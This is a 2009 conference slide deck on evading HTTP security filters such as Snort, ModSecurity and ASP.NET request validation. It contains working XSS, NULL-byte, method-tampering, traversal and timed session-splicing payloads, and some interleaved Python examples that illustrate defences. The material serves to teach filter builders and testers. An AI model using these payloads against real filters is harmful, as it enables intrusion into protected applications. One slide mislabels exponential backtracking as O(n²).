
Filter Evasion: Houdini on the Wire


DESCRIPTION

Today, security filters can be found on our network perimeter, on our servers, and in our frameworks and applications. As the network perimeter becomes more secure, applications become more of a target, and security filters such as IDS and WAF are relied upon to protect them. Intrusion detection evasion techniques were pioneered over a decade ago; how are today's filters withstanding ever-evolving evasion tactics? The presentation examines how evasion techniques worked in the past and provides insight into how these techniques can still work today, with a focus on HTTP attacks. A practical new way to bypass Snort will be demonstrated, along with a tool to test other IDS for the vulnerability in Snort. (Outerz0ne 2009) Video of this presentation at Outerz0ne 5: http://www.irongeek.com/i.php?page=videos/rob-ragan-filter-evasion-houdini-on-the-wire


Page 1: Filter Evasion: Houdini on the Wire

© 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice

Filter Evasion: Houdini on the Wire

Rob Ragan ([email protected])

HP Application Security Center

Page 2: Filter Evasion: Houdini on the Wire

Overview
• Filters
  − Understanding different kinds of filters
  − Identify the shortcomings of signature development
• Evasions
  − Examination of relevant evasion techniques
  − Focus on HTTP attacks
• How to bypass Snort

Page 3: Filter Evasion: Houdini on the Wire

Some Reasons to Elude a Filter
• Money
  − Spammers
• Fun
  − Porn
• Information
  − Truth seekers
• Illegal act
  − Stealing private data

Page 4: Filter Evasion: Houdini on the Wire

Security Filters
• Used to detect actions that attempt to compromise a resource
  − Reactions
    • Allow
    • Deny
    • Log
    • Remove
• Usually a black box
• Typically use signatures, which are black lists

Page 5: Filter Evasion: Houdini on the Wire

Why is it important to understand evasion tactics?
• Cyber criminals
  − Using obfuscation
• Penetration testers
  − Need to keep up with cyber criminals' latest techniques
• Developers (filter creators)
  − Need to know how to properly build filters
• QA
  − Need to know how to properly test filters

Page 6: Filter Evasion: Houdini on the Wire

HTTP Filters Are Everywhere

Filter                               Example
Intrusion Detection Systems (IDS)    Snort
Web Application Firewall (WAF)       ModSecurity
Server Add-on                        IIS UrlScan
Framework                            ASP.NET Request Validation
Browser                              IE8 XSS Filter
Application                          Custom sanitizer (see your code)

Page 7: Filter Evasion: Houdini on the Wire

New Filters
• Announced 14 October 2008
• The DHS is funding new IDS/IPS development
  − "The OISF was formed primarily to begin the development of this new IDS/IPS engine, but will over time take on new projects and challenges." http://www.openinfosecfoundation.org
• Will they learn from history and others' mistakes?

Page 8: Filter Evasion: Houdini on the Wire

Filter Responsibility in the OSI Model

Page 9: Filter Evasion: Houdini on the Wire

Who is responsible for each layer?
• Attackers consistently moving up the stack
  − The network perimeter is safer than ever
  − Applications are more exposed than ever
• Who creates filters?
  − Security professionals
  − Open source community
  − Corporations
• Ultimately developers need to be responsible
• Proper knowledge transfer isn't occurring

Page 10: Filter Evasion: Houdini on the Wire

In February of 1676 Sir Isaac Newton wrote in a letter to Robert Hooke, "If I have seen a little further it is by standing on the shoulders of Giants," implying that while he may have come up with the final idea, he was only able to do so because of the work of those who had gone before him.

Page 11: Filter Evasion: Houdini on the Wire

Whisker's anti-IDS tactics · 1999

• Method matching– GET HEAD

• Url encoding– HEX %xx notation

• Double slashes– '/' '//'

• Reverse traversal– /dir/blahblah/../

• Self-reference directories– /dir/./././././ == /dir/

• Premature request ending– Stop at the first HTTP/1.?\r\n

• Parameter hiding– %3f ?

• HTTP mis-formatting– %20 %09 (TAB)

• Long Urls–  GET /<random>/../dir/a.cgi

• DOS/Win directory syntax– '/' '\'

• NULL method processing– GET\0

• Case sensitivity – 'abc' 'ABC'

Details @ http://www.wiretrip.net/rfp/txt/whiskerids.html

Page 12: Filter Evasion: Houdini on the Wire

Playbook – Let the games begin!
• How to attack HTTP filters across the stack
  − Canonicalization
  − Encoding
  − Method tampering
  − Poison NULL byte
  − Whitespace mis-formatting
  − Case sensitivity

Page 13: Filter Evasion: Houdini on the Wire

Canonicalization
• Process of converting data to the simplest form
• Multiple representations
• Normalization
  − Should use the simplest form before performing detection

Page 14: Filter Evasion: Houdini on the Wire

Canonicalization
• Microsoft Security Bulletin MS05-004 – ASP.NET Path Validation Vulnerability
• "The Microsoft .NET forms authentication capability for ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability."
• Mozilla: http://www.target.com/secureDir\somefile.aspx
• Internet Explorer: http://www.target.com/secureDir%5Csomefile.aspx

Page 15: Filter Evasion: Houdini on the Wire

Poison NULL Byte
• POST Rule Bypass Vulnerability
• Vulnerable March 2007
  − ModSecurity
• ASCIIZ
  − When assigning string data, the assignment will stop if an embedded NULL byte is encountered

str = "ABC" + "\0" + "123";   (pseudocode for C-string concatenation)
str's value is "ABC"

Page 16: Filter Evasion: Houdini on the Wire

Bypass WAF
• Content-Type: application/x-www-form-urlencoded
• POST data starts with an unencoded NULL byte

$ echo -e "\000&var=<script>alert(/xss/);</script>" > postdata
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent
<script>alert(/xss/);</script>
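The ASCIIZ truncation behind this bypass, as an added example (not from the deck or from ModSecurity): ctypes.c_char_p stands in for a C string copy, and the two hypothetical filter functions show a rule that runs on that truncated view versus one that inspects every byte of the body.

```python
import ctypes

# Constructed sample: the slide's POST body, which starts with an unencoded NUL.
POISONED_BODY = b"\x00&var=<script>alert(/xss/);</script>"
CLEAN_BODY = b"var=hello"

def c_string_view(body: bytes) -> bytes:
    """What a filter sees when it copies the body into an ASCIIZ (NUL-terminated)
    C string: ctypes.c_char_p stops at the first NUL, exactly as strlen()/strcpy() do."""
    return ctypes.c_char_p(body).value or b""

def naive_filter_blocks(body: bytes) -> bool:
    """Broken (hypothetical): the rule runs on the C-string view, so every byte
    after the NUL is invisible to it."""
    return b"<script" in c_string_view(body).lower()

def length_aware_filter_blocks(body: bytes) -> bool:
    """Fixed (hypothetical): inspect all Content-Length bytes and drop NULs first,
    so a NUL can neither truncate the buffer nor split a keyword (C%00AST)."""
    return b"<script" in body.replace(b"\x00", b"").lower()

if __name__ == "__main__":
    print(c_string_view(b"ABC\x00123"))               # b'ABC', the slide's str example
    print(naive_filter_blocks(POISONED_BODY))         # False: the rule saw an empty body
    print(length_aware_filter_blocks(POISONED_BODY))  # True
```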

Page 17: Filter Evasion: Houdini on the Wire

Full-Width/Half-Width Unicode
• Bypass HTTP Filters
• Vulnerable May 2007
  − Cisco, 3Com, McAfee, Novell, ISS, CheckPoint, ModSecurity
• An evasion, not an exploit
• Full-width question mark (？) = U+FF1F

Page 18: Filter Evasion: Houdini on the Wire

Full-Width/Half-Width Unicode Attacks

<?php
$input_var = "\xef\xbc\x9Cscript\xef\xbc\x9Ealert(document.location)\xef\xbc\x9C/script\xef\xbc\x9E";
header('Content-Type: text/html; charset=ISO-8859-1');
echo iconv('UTF-8', 'ISO-8859-1//TRANSLIT', $input_var);
?>

Output:
%uff1cscript%uff1Ealert('HAI')%uff1c/script%uff1E
%EF%BC%9Cscript%EF%BC%9Ealert(123)%EF%BC%9C/script%EF%BC%9E

Page 19: Filter Evasion: Houdini on the Wire

HTTP Method Tampering
• Bypass URL Auth
• Vulnerable June 2008
  − Apache 2.2.6/PHP, Tomcat, WebSphere, WebLogic/JSP, ASP.NET
• Security mechanism fails to restrict HTTP methods
• GET functionality that is not idempotent or will execute with an arbitrary method
• Does your HTTP security filter check for the "ROB" method?

Page 20: Filter Evasion: Houdini on the Wire

HTTP Method Tampering
• RFC 2616: The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response
• GET requests to /admin/ are required to come from a user in the admin role
• Expect HEAD, PUT, DELETE to be denied, right?
• Make sure the deny list is explicitly defined
• Attack: HEAD /delete_user.asp?uid=666 HTTP/1.1
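The authorization mistake on these two slides beside its deny-by-default fix, as an added example (not from the deck or from any of the servers listed). The policy functions, the allowed-method set and the path /admin/delete_user.asp are assumptions for the illustration.

```python
from typing import Callable, Optional

ALLOWED_METHODS = {"GET", "POST", "HEAD"}   # constructed policy for the example

def broken_authorize(method: str, path: str, role: Optional[str]) -> bool:
    """Mirrors the slide: the role check is written for GET only, so HEAD,
    PUT, DELETE or an invented method such as ROB never reach it."""
    if method == "GET" and path.startswith("/admin/"):
        return role == "admin"
    return True   # everything else falls through to 'allowed'

def fixed_authorize(method: str, path: str, role: Optional[str]) -> bool:
    """Deny by default: unknown methods are rejected outright, HEAD is folded
    into GET (RFC 2616: identical apart from the missing body), and the role
    check is applied to the protected path whatever the method is."""
    if method not in ALLOWED_METHODS:
        return False
    if method == "HEAD":
        method = "GET"
    if path.startswith("/admin/"):
        return role == "admin"
    return True

def check_request_line(line: str, role: Optional[str],
                       policy: Callable[[str, str, Optional[str]], bool]) -> bool:
    """Apply a policy to a raw HTTP request line such as the slide's attack."""
    method, target, _version = line.split(" ", 2)
    return policy(method, target, role)

if __name__ == "__main__":
    attack = "HEAD /admin/delete_user.asp?uid=666 HTTP/1.1"
    print(check_request_line(attack, None, broken_authorize))  # True: bypass
    print(check_request_line(attack, None, fixed_authorize))   # False: denied
```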

Page 21: Filter Evasion: Houdini on the Wire

ASP.NET Validate Request

Page 22: Filter Evasion: Houdini on the Wire

ASP.NET Framework XSS Filter
• ASP.NET 2.0 checks for:
  − &#
  − < followed by (A-Z) or (a-z) then / or ! or ?
  − Skips strings that start with "__", e.g. __VIEWSTATE
• Attack: "></XSS/*-*/STYLE=xss:e/**/xpression(alert(123))>

Page 23: Filter Evasion: Houdini on the Wire

Encoding Attack
• Directory Traversal Vulnerability
• Vulnerable August 2008
  − Apache Tomcat
• When context.xml or server.xml allows 'allowLinking' and 'URIencoding' as 'UTF-8'

%c0%ae = . (dot)
http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/foo
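A canonicalizer that covers the cases from the canonicalization slides (MS05-004 backslash, the Whisker path tricks), the full-width Unicode slide and this Tomcat overlong-UTF-8 slide, as an added example that is not from the deck or from any of the products named. It assumes the server decodes URIs as UTF-8 and uses Python's strict UTF-8 codec, which rejects overlong sequences, in place of the server's decoder; canonicalize_path and is_protected are hypothetical names.

```python
import unicodedata
from urllib.parse import unquote_to_bytes

def canonicalize_path(raw: str):
    """Return the simplest form of a request path, or None if it is malformed.
    Order matters: decode, then normalise, then resolve dot segments, and only
    then run any signature or ACL against the result."""
    try:
        # 1. Percent-decode to bytes and decode as *strict* UTF-8.  Overlong
        #    sequences such as %c0%ae ('.' to a lenient decoder) raise here.
        text = unquote_to_bytes(raw).decode("utf-8")
    except UnicodeDecodeError:
        return None
    if "\x00" in text:           # poison NULL byte: never let it reach a C API
        return None
    # 2. Fold compatibility forms: full-width U+FF1C / U+FF1E / U+FF1F become
    #    the ASCII < > ? a downstream iconv //TRANSLIT would emit anyway.
    text = unicodedata.normalize("NFKC", text)
    # 3. Treat backslash like slash (MS05-004); empty segments collapse '//'.
    text = text.replace("\\", "/")
    # 4. Resolve '.' and '..' segments and refuse to climb above the root.
    out = []
    for seg in text.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                return None
            out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)

def is_protected(raw: str) -> bool:
    """ACL decision taken on the canonical form, failing closed on malformed input."""
    canon = canonicalize_path(raw)
    return canon is None or canon.lower().startswith("/securedir/")

if __name__ == "__main__":
    for p in ("/secureDir%5Csomefile.aspx", "/dir/./././blah/../a.cgi",
              "/%c0%ae%c0%ae/%c0%ae%c0%ae/foo", "/x/%EF%BC%9Cscript%EF%BC%9E"):
        print(p, "->", canonicalize_path(p), "protected:", is_protected(p))
```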

Page 24: Filter Evasion: Houdini on the Wire

Evasions in RSnake's XSS Cheat Sheet
• Null Byte: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
• Case Insensitive: <IMG SRC=JaVaScRiPt:alert('XSS')>
• Tab: <IMG SRC="jav ascript:alert('XSS');"> (an embedded TAB between "jav" and "ascript")
• Newline: <IMG SRC="jav&#x0D;ascript:alert('XSS');">

Page 25: Filter Evasion: Houdini on the Wire

Encoding
• RFC 1738
  − Only alphanumeric characters and the special characters "$-_.+!*'()," can be included in the URL
• Space is not allowed: %20 or +
• RSnake's cheat sheet contains 70 unique ways to encode < (less than)

Page 26: Filter Evasion: Houdini on the Wire

70 Unique Ways to Encode <
1. <
2. %3C
3. &lt
4. &lt;
5. &LT
6. &LT;
7. &#60
8. &#060
9. &#0060
10. &#00060
11. &#000060
12. &#0000060
13. &#60;
14. &#060;
15. &#0060;
16. &#00060;
17. &#000060;
18. &#0000060;
19. &#x3c
20. &#x03c
21. &#x003c
22. &#x0003c
23. &#x00003c
24. &#x000003c
25. &#x3c;
26. &#x03c;
27. &#x003c;
28. &#x0003c;
29. &#x00003c;
30. &#x000003c;
31. &#X3c
32. &#X03c
33. &#X003c
34. &#X0003c
35. &#X00003c
36. &#X000003c
37. &#X3c;
38. &#X03c;
39. &#X003c;
40. &#X0003c;
41. &#X00003c;
42. &#X000003c;
43. &#x3C
44. &#x03C
45. &#x003C
46. &#x0003C
47. &#x00003C
48. &#x000003C
49. &#x3C;
50. &#x03C;
51. &#x003C;
52. &#x0003C;
53. &#x00003C;
54. &#x000003C;
55. &#X3C
56. &#X03C
57. &#X003C
58. &#X0003C
59. &#X00003C
60. &#X000003C
61. &#X3C;
62. &#X03C;
63. &#X003C;
64. &#X0003C;
65. &#X00003C;
66. &#X000003C;
67. \x3c
68. \x3C
69. \u003c
70. \u003C

Page 27: Filter Evasion: Houdini on the Wire

Still Partying Like It's 1999
• Method matching – GET HEAD

• Url encoding– HEX %xx notation

• Double slashes– '/' '//'

• Reverse traversal– /dir/blahblah/../

• Self-reference directories– /dir/./././././ == /dir/

• Premature request ending– Stop at the first HTTP/1.?\r\n

• Parameter hiding– %3f ?

• HTTP mis-formatting– %20 %09 (TAB)

• Long Urls–  GET /<random>/../dir/a.cgi

• DOS/Win directory syntax– '/' '\'

• NULL method processing– GET\0

• Case sensitivity – 'abc' 'ABC'

Page 28: Filter Evasion: Houdini on the Wire

ASPROX (SQL Injection) Worm
• T-SQL CAST
  − Converts an expression of one data type to another
  − HEX and ASCII encode attacks
  − Poison NULL byte

DECLARE%20@S%20CHAR(4000);SET%20@S=C%00AST(0x4445434C4152452040
...
6F72%20AS%20CHAR(4000));EXEC(@S);--

Page 29: Filter Evasion: Houdini on the Wire

Regular Expressions Are Hard
• XSS Regex from ModSecurity:
(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b|[vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder|background-image:)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\B@import)\b)

Page 30: Filter Evasion: Houdini on the Wire

Catastrophic Backtracking
• Do you worry about performance when writing a Regex?
• Beware of backtracking
• Can lead to exponentially more CPU time for each additional input character O(n²)
• Make sure there is no way to match the same match
• Potential to DoS the filter?

Page 31: Filter Evasion: Houdini on the Wire

Backtracking Example
• (x+x+)+y
  − One or more of the character x
  − One or more of the character x
  − One or more of the previous two matches combined
  − Followed by a single character y
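The slide's pattern worked through, as an added example (not from the deck): ways_to_consume is a model of the distinct ways the group can swallow n x's, which a backtracking engine must exhaust on input with no y, and it doubles with every extra character; same_language checks that the linear rewrite x{2,}y accepts exactly the same strings. The function names and the rewrite are assumptions of the example.

```python
import re
import time
from functools import lru_cache
from itertools import product

CATASTROPHIC = re.compile(r"(x+x+)+y")   # the slide's pattern
LINEAR = re.compile(r"x{2,}y")           # accepts exactly the same strings

@lru_cache(maxsize=None)
def ways_to_consume(n: int) -> int:
    """Number of distinct ways (x+x+)+ can swallow exactly n x's.
    Each iteration of the group eats k >= 2 characters and can split them
    between its two x+ sub-expressions in k-1 ways.  With no 'y' in the input
    a backtracking engine has to try every one of them before it can report
    'no match'.  (Hypothetical model of the engine's work, not a measurement.)"""
    if n == 0:
        return 1
    return sum((k - 1) * ways_to_consume(n - k) for k in range(2, n + 1))

def same_language(max_len: int = 8) -> bool:
    """Confirm the linear rewrite accepts exactly what the original does on
    every x/y string up to max_len (short enough to be safe to run)."""
    for length in range(max_len + 1):
        for chars in product("xy", repeat=length):
            s = "".join(chars)
            if bool(CATASTROPHIC.search(s)) != bool(LINEAR.search(s)):
                return False
    return True

def seconds_to_fail(n: int = 14) -> float:
    """Wall-clock time for the catastrophic pattern to reject n x's.
    Keep n small (<= 18) when trying this; each extra x roughly doubles it."""
    start = time.perf_counter()
    CATASTROPHIC.search("x" * n)
    return time.perf_counter() - start

if __name__ == "__main__":
    for n in range(2, 11):
        print(n, ways_to_consume(n))   # 1, 2, 4, 8, ... = 2 ** (n - 2)
    print(same_language(), seconds_to_fail())
```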

Page 32: Filter Evasion: Houdini on the Wire

PHPIDS Regex Smoketest

Page 33: Filter Evasion: Houdini on the Wire

PHPIDS Regex Smoketest

Page 34: Filter Evasion: Houdini on the Wire

White lists are good, but…
• How many developers or QA engineers know the entire subset of strings they'll match or miss?
• What about signature writers?
• Difficult to find a balance between FP and FN
• The underlying signature engine can have problems

Page 35: Filter Evasion: Houdini on the Wire

Regex Libs Can Have Vulnerabilities
• Perl-Compatible Regular Expression (PCRE)
  − Many serious vulnerabilities
    • CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768
• Even if you do everything else right, the Regex lib you use might get attacked

Page 36: Filter Evasion: Houdini on the Wire

Biggest Target: Application Layer
• What about the Transport Layer?
• 99 problems but TCP ain't 1
• Wrong!

Page 37: Filter Evasion: Houdini on the Wire

Session Splicing
• Network level attack
• Send parts of the request in different packets
  − "GET / HTTP/1.0" may be split across multiple packets to be
  − "GE", "T ", "/", " H", "T", "TP", "/1", ".0"
• Not the same as IP fragmentation

Page 38: Filter Evasion: Houdini on the Wire

IP Fragmentation vs Session Splicing
• IP Fragmentation
  − If the packet is too large for the link layer, a router can split it into multiple fragments
• Session Splicing
  − Purposefully delivering the payload over multiple packets to evade detection; smaller than it needs to be
• IDS Defense
  − Fragment reassembly
  − Session reassembly
  − Send a reset [RST]

Page 39: Filter Evasion: Houdini on the Wire

State of the Evasion
• Does whisker's session splicing tactic still work on Snort?
• Answer: No
• Why?

Page 40: Filter Evasion: Houdini on the Wire

Session Splicing 1999 vs 2009
• The current implementation in whisker will result in 1-3 characters in each packet, depending on your system and network speed
[Chart: 1999 vs 2009]

Page 41: Filter Evasion: Houdini on the Wire

Bypass Snort
• Pragmatic Session Splicing + Timing Attack
  − Use the filter's signatures to split the payload
  − Vulnerable if the IDS stateful inspection timeout is shorter than the session reassembly timeout of the hosts it protects
  − Similar to a fragmentation attack, but instead of at the IP level we move up to the TCP level

Page 42: Filter Evasion: Houdini on the Wire

Time Splicer
• The attack is practical if we split the session on the matches found by the signature we're trying to evade
• Attack: GET /index.php?param=<script>alert(123)</script> HTTP/1.1
  Host: www.target.com
• Signature: matches on <script>|</script> tags
• Know the stateful inspection timeout for the IDS
• Recursively find matches and split the attack string, then send each splice in a new packet with a time delay between each packet

Page 43: Filter Evasion: Houdini on the Wire

Snort Preprocessors
• HTTP Inspect + Stream4
• Stateful inspection
• Default timeout is 30 seconds

# stream4: stateful inspection/stream reassembly for Snort
#------------------------------------------------------------
# Use in concert with the -z [all|est] command line switch to defeat
# stick/snot against TCP rules. Also performs full TCP stream
# reassembly, stateful inspection of TCP streams, etc. Can statefully
# detect various portscan types, fingerprinting, ECN, etc.

# stateful inspection directive
# no arguments loads the defaults (timeout 30, memcap 8388608)

Page 44: Filter Evasion: Houdini on the Wire

POST /rootlogin.asp HTTP/1.1
Host: zero.spidynamics.com
Keep-Alive: 300
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

txtPassPhrase=&txtName=%3Cs
…WAIT 30s…
cript%3Ealert%283%29%3C%2F
…WAIT 30s…
script%3E&txtHidden=This+was+hidden+from+the+user

Page 45: Filter Evasion: Houdini on the Wire
Page 46: Filter Evasion: Houdini on the Wire

Default Session Timeouts

What can you do?
• Fingerprint for the server and application technology
• Fingerprint an IDS

Server Type        Timeout
Apache/PHP         10 minutes
IIS 5.0/ASP        15 minutes
IIS 6.0/ASP.NET    20 minutes
IIS 7.0/ASP.NET    20 minutes

Page 47: Filter Evasion: Houdini on the Wire

DEMO: Time Splicer

Page 48: Filter Evasion: Houdini on the Wire

Questions?

Page 49: Filter Evasion: Houdini on the Wire

Rob Ragan ([email protected])

Check out the HP Security Laboratory on the Blogosphere
http://www.communities.hp.com/securitysoftware/blogs/spilabs/default.aspx